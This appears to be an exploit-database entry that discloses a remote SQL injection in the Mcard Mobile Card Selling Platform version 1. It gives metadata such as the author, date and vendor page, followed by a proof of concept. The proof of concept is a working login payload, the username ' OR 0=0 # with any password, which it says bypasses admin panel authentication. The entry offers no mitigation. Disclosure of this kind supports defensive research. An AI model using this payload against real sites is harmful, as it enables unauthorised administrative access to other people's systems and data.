Mcard Mobile Card Selling Platform 1 SQL Injection

Mcard Mobile Card Selling Platform version 1 suffers from a remote SQL injection vulnerability.


MD5 | 9a06cf5f18e86fe2fd29f86447024a84

# Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC 1 :

# Attacker can bypass admin panel authentication
Username : ' OR 0=0 #
Password : anything


Related Posts